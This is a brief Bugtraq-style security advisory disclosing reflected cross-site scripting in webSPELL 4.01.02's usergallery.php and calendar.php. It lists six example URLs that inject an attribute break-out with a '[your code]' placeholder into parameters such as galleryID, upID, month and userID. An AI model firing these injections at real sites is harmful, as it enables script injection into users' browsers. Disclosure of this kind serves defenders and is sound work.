webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability

From: brainheadbrainhead@gmx.de
To: bugtraq@securityfocus.com
Cc:
Subject: webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
Date:


###################
Autor: Brainhead                                                   
Type: XSS                                                   
Version:  4.01.02                               
Files: usergallery.php, calendar.php                        
Magic Quotes :off                                         
###################
Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[your code]





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.